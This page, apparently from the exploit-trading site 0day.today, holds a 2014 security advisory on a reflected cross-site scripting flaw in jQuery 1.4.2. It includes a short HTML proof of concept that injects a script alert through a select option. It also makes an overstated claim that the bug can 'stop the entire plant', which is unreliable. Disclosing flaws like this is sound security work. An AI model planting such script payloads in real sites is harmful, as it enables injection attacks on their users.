0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JQuery 1.4.2 Cross Site Scripting Vulnerability
XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side From: Mauro Risonho de Paula Assumpção Date: 02.09.2014 13:21:20 -0300 VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001: XSS Reflected JQuery 1.4.2 LEVEL: MEDIUM In our tests authorized by the customer, we can stop the entire plant. Published: 09/01/2014 Version: 1.0 Vendor: Jquery (https://jquery.org/) Product: Jquery 1.4.2 ( http://blog.jquery.com/2010/02/19/jquery-142-released/) Version affected: 1.4.2 Product description: Jquery is a open source software. jQuery is a cross-platform JavaScript library designed to simplify the client-side scripting of HTML(1). Credit: Mauro Risonho de Paula Assumpção aka firebits Finding 1: Create object option in runtime client-side and insert XSS Reflected ‘index.html’ page, by phishing or fake site remote. CVE: CVE-2014-? (feedback cve mitre) Proof of Concept: Exploit:jquery-xss-reflected.com.br.html <!DOCTYPE html> <! -- Mauro Risonho de Paula Assumpcao --> <! -- aka firebits mauro.risonho@gmail.com --> <! -- Exploit jQuery JavaScript Library v1.4.2 --> <! -- 01.09.2014 18:07:14 SaoPaulo/Brazil --> <! -- _____.__ ___. .__ __ --> <! -- _/ ____\__|______ ____\_ |__ |__|/ |_ ______ --> <! -- \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ --> <! -- | | | || | \/\ ___/| \_\ \ || | \___ \ --> <! -- |__| |__||__| \___ |___ /__||__| /____ | --> <! -- \/ \/ \/ --> <! -- bits on fire - 1989-2014 - brazil --> <! -- --> <! -- * jQuery JavaScript Library v1.4.2 --> <! -- * http://jquery.com/ --> <! -- * --> <! -- * Copyright 2010, John Resig --> <! -- * Dual licensed under the MIT or GPL Version 2 licenses. --> <! -- * http://jquery.org/license --> <! -- * --> <! -- * Includes Sizzle.js --> <! -- * http://sizzlejs.com/ --> <! -- * Copyright 2010, The Dojo Foundation --> <! -- * Released under the MIT, BSD, and GPL Licenses. --> <! -- * --> <! -- * Date: Sat Feb 13 22:33:48 2010 -0500 --> <! -- */ --> <html> <head> <meta charset="utf-8"> <title>XSS Reflected - Jquery 1.4.2 </title> <script src="http://<target>/js/jquery.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert('xss reflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil @firebitsbr - mauro.risonho@gmail.com');</script></option> </select> </p> </form> </body> </html> Vendor Response: <It was not sent to the vendor, but this is sending to the MITRE CVE to contact the vendor.> from VSLA Virtual Security Labs Anywhere. VSLA Virtual Security Labs Anywhere recommends installing the hotfix, hardware/software to be putting in a production environment. Remediation Steps: Update jquery 1.11.1 # 0day.today [2024-06-26] #